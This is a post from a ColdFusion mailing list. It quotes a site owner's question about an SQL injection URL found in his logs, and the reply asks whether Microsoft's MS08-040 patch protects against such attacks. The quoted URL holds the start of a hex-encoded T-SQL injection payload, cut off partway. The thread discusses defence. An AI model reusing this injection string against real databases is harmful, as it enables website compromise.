>Just was looking at a 'user monitor' page on one of my sites and I saw the >url string below being called. I've seen several sql injection urls before, >but what the heck are they trying to accomplish here? Eeverything is >cfqueryparam'ed. Thanks, Che > >/rss.cfm?';DECLARE @S CHAR(4000);SET >@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
Hello, naive question maybe, nevertheless: Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? Who had applied the patch(es) but still was attacked and infected successfully? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309430 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
